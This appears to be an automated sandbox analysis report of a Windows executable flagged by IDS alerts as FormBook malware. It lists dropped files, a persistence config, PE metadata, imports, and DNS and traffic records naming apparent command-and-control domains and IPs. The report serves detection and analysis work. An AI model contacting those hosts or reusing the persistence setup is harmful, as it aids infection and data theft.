                                                                                            Preview:H3A1Cb10529Bc5Ij711u265q302j7zv815H2iQ3Tg932H55AN13x08pI17D04RaZ651yPuaD7SPW1oIe85yazKKe4KI599o740ie0g9w7803KY6H5Tq54FxfH4y0f36737g3XgW27..GuiDateTimePicker ButtonConstants..S3L9D7gY8dAr346do10x1ltt53C2R754f9eyeU231CFm30PK8z99f08V7T50ut00ucI7dBy375xrF3eU5DTIH1QzA558t6V49638NZe71KA9Nh..GuiDateTimePicker ToolbarConstants..7S1je7CDzs77788w4297W7BMcb3x75Wb3kCGL7wEs5i2uGNSz58I38jhq33q657m02654T2l99th5PPj9lP0vY41q7w6P488K41G5z46Rrw9b81711YdX5n94Fw801at0O03IQCmFb77CT8Wxj7U244R..ComboConstants ColorConstants..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):565
                                                                                            Entropy (8bit):5.560109550665888
                                                                                            Encrypted:false
                                                                                            SSDEEP:
                                                                                            MD5:1A4B5F34A030C342815A5D774D016639
                                                                                            SHA1:803A73F0FAF9F6651A2B674E3773AB899991033F
                                                                                            SHA-256:7F7CA6630552C360096456892184D04ACC7CA272080FFAF53D8EC6AB256ABBB7
                                                                                            SHA-512:2D7A3624500366867CDEAA3AEE91760B48B91A34C6F9FBB4160FA6BF268BD3F506994626E3599970A1B0179E7BDE5C449C45CD9FFC3F154E403FAFAC60A964F2
                                                                                            Malicious:false
                                                                                            Preview:2t48VtfoQQp73UW77v8oN884r74M26m5y54A5kD3g9G142p4IV45538751u67z695155029j8841259751Jd0699E9NIl2fbO2nfsx6cSx01njp7Ep8FMz7y5Kf836..DateTimeConstants ButtonConstants..D907ktUHx10s1K93eDgQ6C99m198UDJ08GrfnP49Y1rKbGjt5jxyJz6kfNP30R68212kQ2904E1i5S853f2G7g8cUu7..ColorConstants ToolbarConstants..q2g4VZx8xsHPMTwQ7529O9YQ82628HB9f1Fck2dKs17214Q507Q7mDh9o60V49L68jH723s7X55F8X65UQ7089MQVB9K102BpgE4Uo35UQw2441945H12o9M4118xO83..UpDownConstants ToolbarConstants..i5R8H6wI35V8b5q9YFQk3Jsm2TuCaOvgSs71g12mLRym3Ycl9O35s7Q8sA9071BeV30jF0J3Mb7..ToolTipConstants ToolbarConstants..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):85
                                                                                            Entropy (8bit):4.885862043356909
                                                                                            Encrypted:false
                                                                                            SSDEEP:
                                                                                            MD5:BD02417DC940F29598B0AAA3E8722C99
                                                                                            SHA1:87365BF3899781743DB158A2840982DFD44F472A
                                                                                            SHA-256:0FC746E495FF5F1602ABFB1F2F94EA5D5DA6E777D5AD47DACC94B00E8E8CD585
                                                                                            SHA-512:E6D338E14949668EEB61745F0D5513918001FA3E5315AA571BF66950BDD19C1A2C7A5035A420193DB09C0FB092AEF6E01EEC8E598D3C21024800827B0988349C
                                                                                            Malicious:false
                                                                                            Preview:[S3tt!ng]..stpths=%appdata%..Key=WindowsUpdate..Dir3ctory=uhex..ExE_c=bpqdpksed.icm..
                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Entropy (8bit):7.7643756659574645
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:FS04dlvJrq.exe
                                                                                            File size:1'336'477 bytes
                                                                                            MD5:15227b37f486cb74c7676395a12c9296
                                                                                            SHA1:aef022249d8320d02fc5917813df39ceb7f85205
                                                                                            SHA256:16b2851cd765c313395a3cba2a38a16d4338ef32bb68e5c13320494b3c84c52a
                                                                                            SHA512:d01684862e111db09ee010258ba3da2a136af5afaaf3416cf21291ef6fb6d4f2f1c3559ff5f5064a6a760d255b3a0c316df30992c9923be7622dac96f9076ccc
                                                                                            SSDEEP:24576:gN/BUBb+tYjBFHt1IarY0FzwklsQOmNrHS7XiM0hD6di/AO:0pUlRht1IaEUzwkiQVNrS7XiM0hDTF
                                                                                            TLSH:D6551212BBC8C0B3D17516315AA697211D7C7D705F618ACB63E02ABE9B715C2D232FA3
                                                                                            File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......v..p2.b#2.b#2.b#.E.#?.b#.E.#..b#.E.#*.b#...#0.b#..f"!.b#..a"*.b#..g"..b#;..#9.b#;..#5.b#2.c#,.b#..g"..b#..b"3.b#...#3.b#..`"3.b
                                                                                            Icon Hash:033d3f1f9fde611f
                                                                                            Entrypoint:0x4265d0
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x6640971F [Sun May 12 10:17:03 2024 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:5
                                                                                            OS Version Minor:1
                                                                                            File Version Major:5
                                                                                            File Version Minor:1
                                                                                            Subsystem Version Major:5
                                                                                            Subsystem Version Minor:1
                                                                                            Import Hash:99ee65c2db82c04251a5c24f214c8892
                                                                                            Instruction
                                                                                            call 00007FB3650718EBh
                                                                                            jmp 00007FB36507126Dh
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            push ecx
                                                                                            lea ecx, dword ptr [esp+08h]
                                                                                            sub ecx, eax
                                                                                            and ecx, 0Fh
                                                                                            add eax, ecx
                                                                                            sbb ecx, ecx
                                                                                            or eax, ecx
                                                                                            pop ecx
                                                                                            jmp 00007FB36507091Fh
                                                                                            push ecx
                                                                                            lea ecx, dword ptr [esp+08h]
                                                                                            sub ecx, eax
                                                                                            and ecx, 07h
                                                                                            add eax, ecx
                                                                                            sbb ecx, ecx
                                                                                            or eax, ecx
                                                                                            pop ecx
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x47d70 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x47da4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x58000 | 0x1c11c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x75000 | 0x2afc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x44580 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x44600 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x3ec58 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x3c000 | 0x280 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x4722c | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x3a32c | 0x3a400 | e320764e1b3c816ba80aeb820cb8a274 | False | 0.581381605418455 | data | 6.685359764265178 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x3c000 | 0xcbf8 | 0xcc00 | 47c3be3304bfdfb2a778f355849d1c3f | False | 0.4439529718137255 | data | 5.167069652624378 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x49000 | 0xd7e0 | 0x1200 | 6335f9314c2900dccb530e151f1b1ee8 | False | 0.3956163194444444 | data | 4.0290550032041 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0x57000 | 0x1a8 | 0x200 | 232a8fe82993b55cefe09cffc39a79b0 | False | 0.462890625 | data | 3.5080985761326375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x58000 | 0x1c11c | 0x1c200 | a7c879b9efaf4636d4442b596ecc51a4 | False | 0.6667708333333333 | data | 6.562176685447764 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x75000 | 0x2afc | 0x2c00 | 98fd4bc572f87a21f69dc57f720a6dbc | False | 0.75 | data | 6.617141671767599 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x58824 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
PNG | 0x5936c | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
RT_ICON | 0x5a918 | 0xa68 | Device independent bitmap graphic, 64 x 128 x 4, image size 2048 | | | 0.30255255255255253
RT_ICON | 0x5b380 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | | | 0.38109756097560976
RT_ICON | 0x5b9e8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | | | 0.4596774193548387
RT_ICON | 0x5bcd0 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | | | 0.5491803278688525
RT_ICON | 0x5beb8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | | | 0.5506756756756757
RT_ICON | 0x5bfe0 | 0x1628 | Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors | | | 0.4495768688293371
RT_ICON | 0x5d608 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | | | 0.5871535181236673
RT_ICON | 0x5e4b0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | | | 0.7048736462093863
RT_ICON | 0x5ed58 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | | | 0.7482718894009217
RT_ICON | 0x5f420 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | | | 0.42557803468208094
RT_ICON | 0x5f988 | 0x99d3 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.994006958023312
RT_ICON | 0x6935c | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | | | 0.37653519130845536
RT_ICON | 0x6d584 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | | | 0.5063278008298755
RT_ICON | 0x6fb2c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | | | 0.5422138836772983
RT_ICON | 0x70bd4 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | | | 0.569672131147541
RT_ICON | 0x7155c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.43439716312056736
RT_DIALOG | 0x719c4 | 0x286 | data | English | United States | 0.5092879256965944
RT_DIALOG | 0x71c4c | 0x13a | data | English | United States | 0.60828025477707
RT_DIALOG | 0x71d88 | 0xec | data | English | United States | 0.6991525423728814
RT_DIALOG | 0x71e74 | 0x12e | data | English | United States | 0.5927152317880795
RT_DIALOG | 0x71fa4 | 0x338 | data | English | United States | 0.45145631067961167
RT_DIALOG | 0x722dc | 0x252 | data | English | United States | 0.5757575757575758
RT_STRING | 0x72530 | 0x1e2 | data | English | United States | 0.3900414937759336
RT_STRING | 0x72714 | 0x1cc | data | English | United States | 0.4282608695652174
RT_STRING | 0x728e0 | 0x1b8 | data | English | United States | 0.45681818181818185
RT_STRING | 0x72a98 | 0x146 | data | English | United States | 0.5153374233128835
RT_STRING | 0x72be0 | 0x46c | data | English | United States | 0.3454063604240283
RT_STRING | 0x7304c | 0x166 | data | English | United States | 0.49162011173184356
RT_STRING | 0x731b4 | 0x152 | data | English | United States | 0.5059171597633136
RT_STRING | 0x73308 | 0x10a | data | English | United States | 0.49624060150375937
RT_STRING | 0x73414 | 0xbc | data | English | United States | 0.6329787234042553
RT_STRING | 0x734d0 | 0x1c0 | data | English | United States | 0.5178571428571429
RT_STRING | 0x73690 | 0x250 | data | English | United States | 0.44256756756756754
RT_GROUP_ICON | 0x738e0 | 0xe6 | data | | | 0.591304347826087
RT_MANIFEST | 0x739c8 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
DLL | Imports
KERNEL32.dll | LocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA, FindNextFileA
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-06T16:06:09.037540+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.12.23.50 | 443 | 192.168.2.6 | 49735 | TCP
2024-11-06T16:06:47.697936+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.12.23.50 | 443 | 192.168.2.6 | 49920 | TCP
2024-11-06T16:07:04.914090+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49982 | 216.40.34.41 | 80 | TCP
2024-11-06T16:07:20.691584+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49985 | 3.33.130.190 | 80 | TCP
2024-11-06T16:07:23.239548+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49986 | 3.33.130.190 | 80 | TCP
2024-11-06T16:07:25.780692+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49987 | 3.33.130.190 | 80 | TCP
2024-11-06T16:07:28.309362+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49988 | 3.33.130.190 | 80 | TCP
2024-11-06T16:07:35.957533+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49989 | 192.197.113.67 | 80 | TCP
2024-11-06T16:07:38.551301+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49990 | 192.197.113.67 | 80 | TCP
2024-11-06T16:07:41.229477+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49991 | 192.197.113.67 | 80 | TCP
2024-11-06T16:07:43.613704+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49992 | 192.197.113.67 | 80 | TCP
2024-11-06T16:07:49.679877+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49994 | 162.0.225.218 | 80 | TCP
2024-11-06T16:07:52.263241+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49995 | 162.0.225.218 | 80 | TCP
2024-11-06T16:07:54.832066+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49996 | 162.0.225.218 | 80 | TCP
2024-11-06T16:07:57.981805+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49997 | 162.0.225.218 | 80 | TCP
                                                                                            Nov 6, 2024 16:07:38.988936901 CET4999080192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:40.014602900 CET4999180192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:40.019556046 CET8049991192.197.113.67192.168.2.6
                                                                                            Nov 6, 2024 16:07:40.019727945 CET4999180192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:40.030045986 CET4999180192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:40.034862995 CET8049991192.197.113.67192.168.2.6
                                                                                            Nov 6, 2024 16:07:40.035002947 CET8049991192.197.113.67192.168.2.6
                                                                                            Nov 6, 2024 16:07:41.202744007 CET8049991192.197.113.67192.168.2.6
                                                                                            Nov 6, 2024 16:07:41.229320049 CET8049991192.197.113.67192.168.2.6
                                                                                            Nov 6, 2024 16:07:41.229476929 CET4999180192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:41.535762072 CET4999180192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:42.554785967 CET4999280192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:42.559870005 CET8049992192.197.113.67192.168.2.6
                                                                                            Nov 6, 2024 16:07:42.559988022 CET4999280192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:42.567240000 CET4999280192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:42.572253942 CET8049992192.197.113.67192.168.2.6
                                                                                            Nov 6, 2024 16:07:43.562258005 CET8049992192.197.113.67192.168.2.6
                                                                                            Nov 6, 2024 16:07:43.613703966 CET4999280192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:43.760843039 CET8049992192.197.113.67192.168.2.6
                                                                                            Nov 6, 2024 16:07:43.761107922 CET4999280192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:43.764218092 CET4999280192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:43.769123077 CET8049992192.197.113.67192.168.2.6
                                                                                            Nov 6, 2024 16:07:48.947729111 CET4999480192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:48.952780008 CET8049994162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:48.952923059 CET4999480192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:48.976064920 CET4999480192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:48.980912924 CET8049994162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:49.640774012 CET8049994162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:49.679794073 CET8049994162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:49.679877043 CET4999480192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:50.489197969 CET4999480192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:51.514858007 CET4999580192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:51.519869089 CET8049995162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:51.519958019 CET4999580192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:51.534784079 CET4999580192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:51.539787054 CET8049995162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:52.223860025 CET8049995162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:52.263132095 CET8049995162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:52.263241053 CET4999580192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:53.051418066 CET4999580192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:54.084582090 CET4999680192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:54.089689016 CET8049996162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:54.091370106 CET4999680192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:54.105756044 CET4999680192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:54.110677958 CET8049996162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:54.111310005 CET8049996162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:54.792356968 CET8049996162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:54.831903934 CET8049996162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:54.832066059 CET4999680192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:56.176197052 CET4999680192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:57.195852995 CET4999780192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:57.201823950 CET8049997162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:57.203983068 CET4999780192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:57.210938931 CET4999780192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:57.215827942 CET8049997162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:57.941618919 CET8049997162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:57.981587887 CET8049997162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:57.981805086 CET4999780192.168.2.6162.0.225.218
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 6, 2024 16:06:57.938829899 CET | 59346 | 53 | 192.168.2.6 | 1.1.1.1
Nov 6, 2024 16:06:58.573411942 CET | 53 | 59346 | 1.1.1.1 | 192.168.2.6
Nov 6, 2024 16:07:03.586405039 CET | 52031 | 53 | 192.168.2.6 | 1.1.1.1
Nov 6, 2024 16:07:04.217112064 CET | 53 | 52031 | 1.1.1.1 | 192.168.2.6
Nov 6, 2024 16:07:20.012980938 CET | 49152 | 53 | 192.168.2.6 | 1.1.1.1
Nov 6, 2024 16:07:20.026736021 CET | 53 | 49152 | 1.1.1.1 | 192.168.2.6
Nov 6, 2024 16:07:33.342937946 CET | 55361 | 53 | 192.168.2.6 | 1.1.1.1
Nov 6, 2024 16:07:34.332990885 CET | 55361 | 53 | 192.168.2.6 | 1.1.1.1
Nov 6, 2024 16:07:34.897764921 CET | 53 | 55361 | 1.1.1.1 | 192.168.2.6
Nov 6, 2024 16:07:34.898325920 CET | 53 | 55361 | 1.1.1.1 | 192.168.2.6
Nov 6, 2024 16:07:48.779344082 CET | 53160 | 53 | 192.168.2.6 | 1.1.1.1
Nov 6, 2024 16:07:48.939687967 CET | 53 | 53160 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 6, 2024 16:06:57.938829899 CET | 192.168.2.6 | 1.1.1.1 | 0x3b | Standard query (0) | www.uphc255.vip | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:07:03.586405039 CET | 192.168.2.6 | 1.1.1.1 | 0x42a4 | Standard query (0) | www.integritywork.shop | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:07:20.012980938 CET | 192.168.2.6 | 1.1.1.1 | 0x9190 | Standard query (0) | www.ontohealth.net | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:07:33.342937946 CET | 192.168.2.6 | 1.1.1.1 | 0x20da | Standard query (0) | www.c6ytv.net | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:07:34.332990885 CET | 192.168.2.6 | 1.1.1.1 | 0x20da | Standard query (0) | www.c6ytv.net | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:07:48.779344082 CET | 192.168.2.6 | 1.1.1.1 | 0xfae6 | Standard query (0) | www.sadey.info | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 6, 2024 16:06:58.573411942 CET | 1.1.1.1 | 192.168.2.6 | 0x3b | Name error (3) | www.uphc255.vip | none | none | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:07:04.217112064 CET | 1.1.1.1 | 192.168.2.6 | 0x42a4 | No error (0) | www.integritywork.shop | | 216.40.34.41 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:07:20.026736021 CET | 1.1.1.1 | 192.168.2.6 | 0x9190 | No error (0) | www.ontohealth.net | ontohealth.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 6, 2024 16:07:20.026736021 CET | 1.1.1.1 | 192.168.2.6 | 0x9190 | No error (0) | ontohealth.net | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:07:20.026736021 CET | 1.1.1.1 | 192.168.2.6 | 0x9190 | No error (0) | ontohealth.net | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:07:34.897764921 CET | 1.1.1.1 | 192.168.2.6 | 0x20da | No error (0) | www.c6ytv.net | c6ytv.net.huanxidx.buyusdt.me | | CNAME (Canonical name) | IN (0x0001) | false
Nov 6, 2024 16:07:34.897764921 CET | 1.1.1.1 | 192.168.2.6 | 0x20da | No error (0) | c6ytv.net.huanxidx.buyusdt.me | huanxidx.buyusdt.me | | CNAME (Canonical name) | IN (0x0001) | false
Nov 6, 2024 16:07:34.897764921 CET | 1.1.1.1 | 192.168.2.6 | 0x20da | No error (0) | huanxidx.buyusdt.me | x105.jieruitech.info | | CNAME (Canonical name) | IN (0x0001) | false
Nov 6, 2024 16:07:34.897764921 CET | 1.1.1.1 | 192.168.2.6 | 0x20da | No error (0) | x105.jieruitech.info | | 192.197.113.67 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:07:34.898325920 CET | 1.1.1.1 | 192.168.2.6 | 0x20da | No error (0) | www.c6ytv.net | c6ytv.net.huanxidx.buyusdt.me | | CNAME (Canonical name) | IN (0x0001) | false
Nov 6, 2024 16:07:34.898325920 CET | 1.1.1.1 | 192.168.2.6 | 0x20da | No error (0) | c6ytv.net.huanxidx.buyusdt.me | huanxidx.buyusdt.me | | CNAME (Canonical name) | IN (0x0001) | false
Nov 6, 2024 16:07:34.898325920 CET | 1.1.1.1 | 192.168.2.6 | 0x20da | No error (0) | huanxidx.buyusdt.me | x105.jieruitech.info | | CNAME (Canonical name) | IN (0x0001) | false
